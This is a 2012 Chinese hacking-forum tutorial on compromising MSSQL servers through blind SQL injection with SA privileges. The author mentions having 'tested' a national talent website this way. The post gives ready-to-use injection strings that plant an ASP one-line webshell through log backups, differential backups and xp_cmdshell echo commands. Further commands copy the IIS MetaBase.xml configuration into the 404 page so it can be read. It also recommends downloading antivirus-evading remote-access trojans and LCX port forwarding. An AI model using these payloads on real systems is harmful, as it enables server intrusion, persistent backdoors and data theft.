中国网络渗透测试联盟

标题: sa权限的教程. [打印本页]
作者: admin    时间: 2012-9-15 14:30
标题: sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
* O$ }: b8 ?; e% `7 f6 h9 m
" c" P, k# A. K% |0 P. p
/ U) a! K6 \5 N                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
$ ?3 i5 @& E* p2 U+ Z7 {8 r- i$ C2 a! q
                                                                 ) i3 ^* N( `3 \3 Q( x1 f3 ]' Q
                                                                 
" g$ `& ?$ f" K                                                                  论坛: http://www.90team.net/5 M9 R8 A) v- K8 L4 c( w

: ]+ ~7 D8 h' w, ^( F2 g
9 M% V. Q/ V2 F6 C
& g" z0 S  d; r& T友情检测国家人才网  \, i: O9 d: J: O- M, q( U  v* F

) r4 k9 B1 e5 d* O& x
: f0 J3 c' ^" C内容:MSSQL注入SA权限不显错模式下的入侵) g2 y, X$ R% n' X4 `( y- x
1 }4 h! }5 \9 t" E+ }2 x: X  h. {+ O
7 Z* u4 [3 W7 f0 [- g  l
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
& k2 {" I4 j4 W) M/ m8 O
) z8 D) j' R/ i5 X: ]4 }0 j我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
, r$ G' z, C/ a8 ?7 R
; y9 ~, j. X5 `/ X" I' K
# D  v* b8 p1 F这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
1 {+ U) e5 g, \0 ]9 Q  i7 _7 G. v! ]
1 v  x+ V, F6 q+ L6 D% A: c$ r思路:
# m2 |' Q; J  G2 q- C5 x. c4 R
! I* o  h: P: I- C首先:$ ~: M( x! h0 t; b$ x3 M0 p3 K

: i! B0 S* S' b9 S  R! N. A通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。4 d' J  U) d7 M* l# @; E

* x& z7 N4 x" e0 m3 @0 @9 L( o1.日志备份获得Webshell8 L6 f6 c& l0 B4 m4 K

3 i+ P4 H6 ?& r$ L, p" G2.数据库差异备份获得Webshell4 q) s  Y8 L: X' M3 i
+ _6 c# E) t8 C9 _8 n
4.直接下载免杀远控木马。
1 O: w/ a1 w; G! A( F' Y' j1 }9 f/ Q7 r* T
5.直接下载LCX将服务器端口转发出来
1 _1 ~" M8 i3 K+ x, F( ]0 _- T# E8 R0 ]+ |
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
9 t5 w7 K7 k$ u# r% d1 g  O( M0 _

, Y- F) `* ^' J5 N+ N6 r% r: W; h, U4 \& i' b0 _% Z6 G) k
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
0 s1 W$ D% i1 {8 }/ K# m2 n
# _( t4 e7 Z( n# J2 \( V9 X' ]" d) Y我直接演示后面一个方法
/ E. I5 j9 M9 E5 a
# a. k# t: R* O* v; j; E. {( g0 g0 Q  I4 c! z+ h: P
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
3 ?9 J+ @) h7 `, f" f5 r7 f7 E4 I1 F7 i( [7 p

! @- J* L0 x; c: K9 z  T0 J6 J; f, _3 C3 X& {" i8 U( @

0 Y  g: E; T$ \" V% H& a1 W" S( _◆日志备份:1 e) k8 G$ o3 ]; n8 s) o* @
4 b* d8 F7 v7 F8 k% k' P
4 X6 N  I  ?* R- p* r6 [5 u
1. 进行初始备份" v) T! `) }3 J8 Q
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
7 E6 o7 L5 Y% H+ Z9 U( ]8 N. |. M0 |% L. I
2. 插入数据1 n0 a5 b. ~3 g6 q
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--$ O2 u5 x  e' q4 P; |
1 T. R* a" _6 L! B. M+ g; M% n
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>. I6 y; ~% _( c8 L! J
  & H" |0 a& N9 V$ V7 U( c9 Q0 ~
3. 备份并获得文件,删除临时表) F; v% w8 P7 G
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--9 |. q0 }: z! `0 }$ T0 N

6 ?! C- g* w' |, W1 o# J$ i1 c- q
2 ~1 M1 F% s; e9 O% j' G
# r2 x3 c; l$ ~2 B. u◆数据库差异备份
/ ]2 B* \2 c; \, ^. Q0 h9 _8 `) u$ f
3 m* o, ^0 o  g(1. 进行差异备份准备工作
/ z5 m! i1 N' D* H  B# K& c$ j. l0 Q7 r  J! e% X/ p: O) }* y( x
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--* {3 _6 R9 S: |6 r! u2 i: ]0 S2 v

6 G) V2 ^' t  ~! ~' u0 O上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码3 c! ?9 A9 }2 ?3 U4 I
/ ~7 }9 g+ f6 }
, {  Y& ~& ~! i7 k4 M4 }
(2. 将数据写入到数据库
% c% I$ Z8 v- Y  u;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
4 F" B6 T2 H, \$ K& ]0 U0 V3 G0 F
4 h3 m  R1 b" r3 ~7 f" m0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>4 _, `2 f7 e- k7 G9 y3 {( `% @. o

; }! b/ \! M" H+ U7 V/ W3. 备份数据库并清理临时文件% e( p, G- F4 C* K4 m4 S
9 @& t0 I/ E; t; T/ }; }3 i# ?2 E4 Q
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--9 D: C0 ?& i. C! M) E( @
6 Y" H% G3 |) }5 g1 h
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
7 |5 p; {- }: r* R$ C7 C: O) w6 k$ J

" e* U! \/ T- f" M4 B: {
/ ?, X0 ^; y/ r1 g" I$ G; S) S  H) y用^转义字符来写ASP(一句话木马)文件的方法:   
# l4 _. v# i( n; k: F( A# n6 O1 P& B7 X- i0 R# S  M, @+ u" b
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--) [& v% v. r8 {! Q. [

" `, g5 b- g- B4 N2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp # F$ a# o3 u/ |0 i% @' u) F
3 b' {" w2 K7 i- a8 r  g) m: d5 g! S
读取IIS配置信息获取web路径/ h9 ?4 n1 l+ R8 |3 t$ s3 i

+ l$ |0 Y+ L/ D, A7 q     
" q! m8 E: G5 x. G  D1 W     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
+ y# o: m+ h/ d; E8 z; v
9 u. c! _. C2 M  Q, K1 K2 c% D) v5 D执行命令1 y7 h% G  s" J) z
     
- l5 |1 Y  ^8 v& x# V' s7 x     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--# s3 h7 r& t4 l; c% q; b6 B8 N
8 A, e. _6 x! ?% [. Q; `+ \
1 K7 x7 M% y% y; r- j/ v4 v

5 D& E  f5 q, {, ?' S
$ R7 ~7 l9 [; C# P7 w' w$ d7 B4 S2 D) X' Q# R" k0 U
5 A0 g( w4 h$ f. G) Q

1 m: v& e+ ?& X0 j  q$ K$ P$ k( j; @- w- t" p* B9 P$ |. Y9 Y

7 U2 f0 d* x9 D
1 ~6 }7 r/ X4 G! R3 t: L. w* e: b
1 N* b7 P* P. g& R4 C8 Z9 r
, I! F- z- j6 X6 J+ C) g
$ x$ \+ F2 o4 r- f+ T1 }) i6 M# E. u; F& y% R1 Y7 A

7 n8 N) U- s  Q; z9 r; D5 }2 U
$ p6 K8 a  T7 D- X. m, r" X9 k' }/ {8 S: ]- U

& }. W& l& T% f; y, F0 M/ r# J1 A! }

, u+ n! l7 I: m  K, P" j' Z1 ]+ ]- B5 h

0 q. L, l) `% d) E1 ^% s  F& T2 T" _* R4 I1 j

' V% g$ m3 o2 j; i; c  I. K' `0 D9 @- C( `( s1 x
  \" }# @0 X; \8 H. b. O- X" `

" c  t9 _5 D/ w9 p0 E
1 w. f' ^8 p' a/ a/ H  L4 I+ `) [. B  \( k

$ s6 k: A9 ^( H
$ H) u  S! \) p* M2 A, |  w& {; z) q/ w* {  _& V9 r! R

, ~) I  K/ |# n% U; l# t5 a7 `- o. S+ W, _$ c7 u) p% u
1 Q1 b; `/ d3 t1 O; M
  S0 E! ~; p0 f

( g1 m; h. E( A6 k* Y4 p7 G+ U
, N- X7 N- r% I5 Z* f; p1 D4 L7 S8 L% \8 F9 K+ y
1 U" l/ [& A8 G2 F7 s6 m

7 R) G3 \7 v$ k
! P, C: ~- ]/ M8 E) S2 l2 A. x1 ?; H1 u
7 K0 q% H! ^0 Y7 z; z8 _. V) N# t) k0 o% B4 i* |& Y

3 h7 _1 z/ Z( b( O7 Z2 n
- B( ?# C; n/ U/ H- @! R8 K4 `7 B9 U+ z
) C" G8 e& g3 B! Y, b7 `




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2